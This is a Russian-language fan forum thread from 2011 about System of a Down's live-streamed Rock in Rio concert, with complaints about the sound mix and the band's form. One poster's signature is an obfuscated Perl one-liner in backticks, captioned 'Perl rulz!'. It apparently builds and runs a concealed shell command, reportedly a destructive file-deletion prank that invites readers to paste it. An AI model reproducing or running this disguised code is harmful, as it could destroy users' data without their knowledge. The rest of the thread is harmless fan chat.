Добавлено: Пт Окт 07, 2011 11:27 am Заголовок сообщения:
Системщик,называется -_-
выступление на одном из самых крупнейших рок-фестивалей мира,в Рио-де-Жанейро,транслировавшееся в прямом эфире по ютубу _________________ Дарон:Подвинься
Серж:Похудей(с)
MorGana
И чё, как выступили? _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
MorGana
да на самом деле я не фанат системы, я вообще не любитель всяких рамок в которые загоняют в себя люди. раньше может и назвался бы, а сейчас понимаю, что нет в этом какой-то необходимости.
спасибо за ссылку, вот сейчас посмотрю м.б. =)
-ЗВУКАЧИ-УРОДЫ!В первой половине выступления гитары так громко звучали,что Сержа вообще нихера не слышно было.
-Кстати о Серже.Часто пел=выл как священник в храме за упокой...да ещё и в белом... хоть ниц падай
-Ну,Дарон иногда лажал,как в старые добрые времена=)
-и опять же,ЗВУКАЧИ-УРОДЫ!!Если б не они,впечатление от выступления было бы ещё лучше
но всё равно клаааасс=)они постепенно приходят в форму _________________ Дарон:Подвинься
Последний раз редактировалось: MorGana (Пн Окт 10, 2011 6:08 pm), всего редактировалось 1 раз
до охренения порадовало то,что всё это транслировалось в прямом эфире на московское время концерт приходился на 6:00 утра
но что поделать) Со словами "надо,Федя,надо...ради Системы" кое-как встала(хотя ужасно хотелось спать!)
но ничего.Уже после первых аккордов Призон сонг сон как рукой сняло=) _________________ Дарон:Подвинься
я на самом деле тоже не смотрел, меня только выбесило что они пели там иннервижн и минд, которых я на моих двух концертах так и не дождался
и да, тут лучше реально никого фанатом не называть, а системщик это вообще имя собственное и чуть ли ни оскорбление =) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Чт Окт 20, 2011 12:45 am Заголовок сообщения:
Я, прям боюсь спугнуть нового человека на форуме
MorGana
Я так и не посмотрел. И, думаю, никто не посмотрел. _________________ Everybody like to be
in my place instead of me
cause I?m the king of Bongo
baby I?m the king of Bongo Bong
с чего ж мне пугаться о_О
гыы
ну когда я онлайн смотрела это конечно намного интереснее чем в записи))
TroubleMaker
ччёрт,мэн на твоей аве... знакомый фэйс... он по-моему в фильме "Время ведьм" играл,не? _________________ Дарон:Подвинься